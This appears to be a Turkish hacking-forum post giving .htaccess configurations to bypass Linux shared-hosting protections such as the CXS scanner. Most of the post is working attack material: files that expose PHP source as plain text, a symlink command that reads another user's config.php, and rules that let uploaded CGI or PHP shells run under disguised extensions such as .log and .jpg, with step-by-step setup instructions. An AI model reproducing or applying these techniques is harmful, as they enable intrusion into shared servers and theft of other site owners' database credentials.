Filename | Linux Server Disable Functions Bypass |
Permission | rw-r--r-- |
Author | KriptoH |
Date and Time | 17:04:00 |
Label | |
Action |
Selamün aleyküm arkadaslar bu yazımda Linux serverlerde CXS bypass ve Forbidden Not Found videosu çektim
Forbidden .htaccess :
Options all
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddHandler server-parsed .php
AddHandler txt .php
Geliştirilmiş Forbidden .htaccess :
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName deneme.txt
aynı mantık ile ln -s /home/user/public_html/config.php deneme.txt ekrana yansıtıyoruz. not : her serverde işe yaramaz her swnin kendi mantıka göre gecilme yöntemleri var.
Bu yazıyla beraber şimdi CXS serverlerde Shell yememe sorunu Cgi yememe sorunuyla ilgili yazıyı yazayım bunun .htaccess bypass yontemi vardır ama her sunucuda calısmaz.
.htaccess :
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
Oncelikle s4 adında klasör olusturun chmod 755 verin üst'e verdigim .htaccess server atın Cgi'nizi .log olarak kaydetin chmod 0755 verin.
Fazla uzun tutmuycam yazıyı Selametle.